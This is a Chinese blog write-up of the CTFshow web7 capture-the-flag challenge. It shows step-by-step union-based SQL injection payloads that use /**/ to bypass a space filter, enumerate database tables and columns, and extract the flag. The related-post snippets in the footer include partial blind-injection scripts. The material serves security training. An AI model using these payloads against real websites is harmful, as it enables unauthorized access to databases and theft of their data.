CTFshow-web-web7

最新推荐文章于 2024-05-26 13:52:18 发布
最新推荐文章于 2024-05-26 13:52:18 发布
阅读量127 收藏
点赞数
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68581192/article/details/133760507
版权

CTFshow-web-web7

打开靶场,显示如下
在这里插入图片描述
点击第一篇,发现url中有id=1,可能存在sql注入漏洞
在这里插入图片描述
尝试输入id=1 and 1=1#,发现有错误
在这里插入图片描述
可能过滤了空格,我们用/**/代替空格,id=1/**/and/**/1=1# 显示正常,id=1/**/and/**/1=2# 显示异常,判断为数字型注入
在这里插入图片描述
在这里插入图片描述
尝试联合注入,先来判断显示位,此处id传一个-1,由于id通常不为负数,后端根据id查询不到内容,就只能展示联合查询的结果,从而帮助我们判断字段显示的位置,输入id=-1/**/union/**/select/**/1,2,3#
在这里插入图片描述
回显位置为2,查询当前使用的数据库,输入id=-1/**/union/**/select/**/1,database(),3#
在这里插入图片描述
当前使用的数据库是web7,再查询当前数据库的所有表,输入id=-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3#
在这里插入图片描述

发现一个flag表,再查询flag表中的所有字段,输入id=-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema="web7"/**/and/**/table_name="flag"),3#
在这里插入图片描述

发现只有一个flag字段,查询flag表中的flag字段,输入id=-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3#
在这里插入图片描述
找出flag

T大白兔奶糖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 603
ctfshow web7-web10
ctfshow web入门——web7
m0_74093152的博客
01-29 331
ctfshowweb入门——web7
【CTF Web】CTFShow web7 Writeup(SQL注入+PHP+进制转换)
最新发布
HEX9CF的技术博客
05-26 673
1阿呆得到最高指示,如果还出问题,就卷铺盖滚蛋,阿呆心在流血。
ctfshow web7
博客地址 www.sec0nd.top
02-25 981
文章目录题目分析解题过程 题目分析 打开题目后,有三个文章 随便点一个之后发现网址上有个后缀 ?id=2 应该是get传参的注入了 在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注 他这个过滤了空格,用/**/代替(详见web6 wp) 解题过程 盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题 import requests s=requests.session() url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.ch
ctfshow-web7
aarong的博客
12-22 1256
如题所示: 随意点入一个文章,在URL中发现有?id=x这样参数,因此判断有SQL注入点: 跟上题一样这题也是过滤空格的 把空格改成/**/,发现没有过滤 随后就是把?id=-1,联合查询就行了 http://63d80c8a-317e-4b8f-a2a0-0af74c123b1b.challenge.ctf.show/index.php/?id=-1/**/union/**/select/**/1,database(),3 得到数据库web7 爆表得到三张表flag、page、user 这里
CTFShow web1-7——CTF秀WEB模块解题思路_ctfshow web题目解析
2401_83974142的博客
04-17 779
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。第六关是一个SQL注入漏洞, 注入类型为数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或 括号() 来绕过。第七关也是一个SQL注入漏洞, 注入点是数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或 括号() 来绕过。
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
2024年最新ctfshow-WEB-web7_ctfshow web7,网络安全推送技术解析
2401_84300859的博客
05-06 797
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctfshow web系列
RealIiikun的博客
04-07 957
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 324
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
ctfshow web7-9
qq_61988806的博客
12-08 313
web7-9 通过点击几个目录发现id在变化可能存在sql注入 使用/?id=1 and 1来测试 发现出错 尝试找出过滤 最后发现过滤了空格使用/**/来绕过 构造/?id=1/**/and/**/1 和/?id=1/**/and/**/0 时sql恒不成立 构建 ?id=1/**/and/**/1/**/order/**/by/**/3 来查字段 得到字段为3 构建/?id=-1/**/union/**/select/**/1,2,3(由于使用联...
ctf.show web7,8,10
qq_45826388的博客
09-13 941
web7 查看列表文章发现?id= 判断为sql注入 当有空格时会报错,用/**/绕过,得到注入点 盲猜flag from flag web8 测试发现过滤了空格,逗号,and 当url判断为真时有回显 数据库视角: 进行盲注 substr(database(),1,1) 等同于 substr(database()from 1 for 1) 写python 脚本 import requests import re s = r'<h4>If</h4>' flag = ''
CTFShow Web7&Web8
qq_62566956的博客
03-29 349
版本控制很重要,但不要部署到生产环境更重要。
ROSE笔记-ctf.show_web7-WP
居上
11-06 249
ctf.show_web7 使用盲注 payload: /?id=1’ or 1=1# 发现过滤了空格所以报错 用//替换空格 payload: /?id=1’//or/**/1=1# 此时页面正常显示 接下来就是查库、查表、查字段 查到显示位置 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,2,3# 查表 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**
CTF.show:web7-web8
qq_46230755的博客
01-15 916
web7 这题是一题盲注题,对url进行盲注测试 从网上找到的师傅的爆表名脚本 import requests url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/" def db(url): # 爆库名 for i in range(1, 5): for j in range(32, 128): u = "or/**/ascii(s
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值